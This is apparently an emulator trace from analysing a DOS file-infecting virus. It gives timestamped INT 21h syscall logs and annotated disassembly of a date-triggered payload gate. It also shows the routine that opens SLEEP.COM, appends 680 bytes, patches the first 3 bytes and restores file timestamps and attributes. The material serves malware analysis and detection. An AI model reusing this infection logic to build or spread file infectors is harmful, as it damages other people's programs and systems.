2018-12-25T12:30:58.227939007Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:58.229916255Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:58.237452764Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:58.239300627Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:58.245616599Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:58.247657796Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:58.25775934Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:58.259703016Z 62 PC: 12c31 | Close file
2018-12-25T12:30:58.269229612Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:58.280679629Z 26 PC: 12c49 | Set disk transfer address

{"DateBased":true,"Day":4,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":11634,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:58.477337645Z 48 PC: 12a69 | Get DOS version
2018-12-25T12:30:58.480110062Z 47 PC: 12a75 | Get disk transfer address
2018-12-25T12:30:58.482048589Z 26 PC: 12a85 | Set disk transfer address
; Date gate: window printed after INT 21h AH=2Ah "Get date" (returns CX=year, DH=month, DL=day).
; All three tests below must pass before the loop at 0x12ab2 is reached; a run whose emulated date fails any of them jumps to 0x12ad2 instead.
; NOTE(review): the window looks like a fixed 20-instruction linear listing from the return address, not the executed path.
; This run logs a single "Get date" row, so execution left the gate at the year test; that fits the Year 1980 / Day 4 clock record printed above the run, assuming that record is this run's setting.
2018-12-25T12:30:58.483656088Z 42 PC: 12a94 | Get date 0x12a94: cmp cx, 0x7c6    ; year against 0x7c6 (1990)
0x12a98: jge 0x12a9c    ; year >= 1990: continue with the month test
0x12a9a: jmp 0x12ad2    ; otherwise leave the gate (target lies beyond this window)
0x12a9c: mov ah, 0x2a
0x12a9e: int 0x21    ; "Get date" again
0x12aa0: cmp dh, 9    ; month against 9
0x12aa3: jge 0x12aa7
0x12aa5: jmp 0x12ad2
0x12aa7: mov ah, 0x2a
0x12aa9: int 0x21    ; "Get date" a third time
0x12aab: cmp dl, 4    ; day of month against 4
0x12aae: jge 0x12ab2
0x12ab0: jmp 0x12ad2
0x12ab2: mov al, byte ptr [0x334]    ; loop head: AL = counter byte at [0x334]
0x12ab5: call 0x12ac5    ; helper whose first instruction is the last line of this window
0x12ab8: cmp byte ptr [0x334], 0x19
0x12abd: je 0x12ad2    ; stop once the counter equals 0x19
0x12abf: inc byte ptr [0x334]
0x12ac3: loop 0x12ab2    ; dec CX, repeat while CX != 0
0x12ac5: mov ah, 5    ; helper entry; the window is cut here
2018-12-25T12:30:58.486579094Z 78 PC: 12b4a | Find first file
2018-12-25T12:30:58.49939165Z 67 PC: 12b86 | Get or set file attributes
2018-12-25T12:30:58.506112522Z 67 PC: 12b96 | Get or set file attributes
2018-12-25T12:30:58.524727785Z 61 PC: 12ba0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:58.533533131Z 87 PC: 12bac | Get or set file date and time
; Window printed after INT 21h AH=2Ch "Get time" (DH=seconds). It shows the start of the file-modification sequence
; that the following log rows record: read 3 bytes, seek, write 680 bytes, seek, write 3 bytes on the opened SLEEP.COM handle.
; NOTE(review): "Get or set file date and time" and "Get or set file attributes" rows appear on both sides of the writes, which
; suggests they are saved and restored; if so, the file's timestamp is not a reliable change indicator — compare size or hash instead.
2018-12-25T12:30:58.535386773Z 44 PC: 12bb6 | Get time 0x12bb6: and dh, 7    ; keep the low three bits of the seconds value
0x12bb9: jmp 0x12bbb    ; jumps to the next instruction; no test of the masked value is visible here
0x12bbb: mov ah, 0x3f    ; INT 21h function 3Fh: read from handle (BX is set outside this window)
0x12bbd: mov cx, 3    ; three bytes
0x12bc0: mov dx, 0x1d
0x12bc3: add dx, si    ; buffer at [si + 0x1d]
0x12bc5: int 0x21
0x12bc7: jb 0x12c1c    ; carry set = DOS error: bail out
0x12bc9: cmp ax, 3
0x12bcc: jne 0x12c1c    ; short read: bail out
0x12bce: mov ax, 0x4202    ; INT 21h function 42h, AL=02h: seek relative to end of file
0x12bd1: mov cx, 0
0x12bd4: mov dx, 0    ; offset CX:DX = 0, so the call returns the file size
0x12bd7: int 0x21
0x12bd9: jb 0x12c1c
0x12bdb: mov cx, ax    ; CX = low word of the file size
0x12bdd: sub ax, 3
0x12be0: mov word ptr [si + 0x21], ax    ; size - 3 stored; presumably the operand of the 3-byte write logged later (confirm)
0x12be3: add cx, 0x30b
0x12be7: mov di, si    ; window is cut here
2018-12-25T12:30:58.538124683Z 63 PC: 12bc7 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:58.546274994Z 66 PC: 12bd9 | Move file pointer
2018-12-25T12:30:58.548250549Z 64 PC: 12bfc | Write file or device (Write 680 bytes on handle 5)
2018-12-25T12:30:58.557966668Z 66 PC: 12c0e | Move file pointer
2018-12-25T12:30:58.560347973Z 64 PC: 12c1c | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:58.567748445Z 87 PC: 12c2d | Get or set file date and time
2018-12-25T12:30:58.569465423Z 62 PC: 12c31 | Close file
2018-12-25T12:30:58.57890931Z 67 PC: 12c3e | Get or set file attributes
2018-12-25T12:30:58.591606367Z 26 PC: 12c49 | Set disk transfer address